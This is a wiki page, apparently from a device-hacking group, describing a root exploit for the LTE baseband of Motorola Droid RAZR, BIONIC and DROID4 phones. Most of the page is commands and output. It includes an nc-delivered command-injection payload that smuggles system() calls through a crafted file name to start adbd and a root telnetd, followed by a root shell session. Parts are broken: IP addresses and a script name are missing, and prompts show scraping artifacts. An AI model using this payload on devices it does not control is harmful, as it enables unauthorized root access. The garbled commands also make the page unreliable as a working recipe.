Revision as of 01:22, 7 February 2016 by Resno (talk | contribs) (Text replacement - "gtvcom-20" to "exploiteers-20")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigationJump to search

"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."


This page will be dedicated to a general overview, descriptions, and information related to the Motorola Droid RAZR, BIONIC, DROID4.


Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the Motorola Droid RAZR at Amazon


  • This attack works on the LTE basedband on the Motorola Razr, Bionic, and Droid4

Android communicates with the baseband over an internal USB network (Android) <- usb network -> (LTE)

   usb1      Link encap:Ethernet  HWaddr 02:21:00:1D:34:FB  
             inet addr:  Bcast:  Mask:
             inet6 addr: fe80::21:ff:fe1d:34fb/64 Scope:Link
             UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
             RX packets:916 errors:0 dropped:0 overruns:0 frame:0
             TX packets:910 errors:0 dropped:0 overruns:0 carrier:0
             collisions:0 txqueuelen:1000 
             RX bytes:337347 (329.4 KiB)  TX bytes:63269 (61.7 KiB)

Included in the Android filesystem is a /system/bin/ which demonstrates usage:

   for cmd in "state" "logs" "files" "panic" "atvc"; do
       echo "-o wrigley $cmd" | nc -w 10 3002

Port 3002 redirects to a shell script running as root:

       local inFilePath="$1"
       local outFilePath="$2"
       case $(echo | busybox awk '{print substr("'"${outFilePath}"'",0,1)}') in
           "/") ;;
           *) outFilePath="/$outFilePath"

Note the strange filename parsing using awk.

In addition to port 3002 there's also a limited shell running on port 3023.

   echo "\ntouch '/pds/public/x\",0,1);system(\"start\${IFS}adbd;start\${IFS}telnetd-root\");(\"'\nexit" | nc 3023
   echo "files" | nc 3002 > /dev/null
   adb pull /system/xbin/telnet /data/local/tmp/telnet
   chmod 755 /data/local/tmp/telnet


   Entering character mode
   Escape character is '^]'.
   [email protected](unknown):/# 
   [email protected](unknown):/# cat /proc/cpuinfo
   Processor       : ARM926EJ-S rev 5 (v5l)
   BogoMIPS        : 189.57
   Features        : swp half thumb fastmult edsp java 
   CPU implementer : 0x41
   CPU architecture: 5TEJ
   CPU variant     : 0x0
   CPU part        : 0x926
   CPU revision    : 5
   Hardware        : Wrigley 3G DatacardLTE
   Revision        : 0000
   Serial          : 0000000000000000
   [email protected](unknown):/# whoami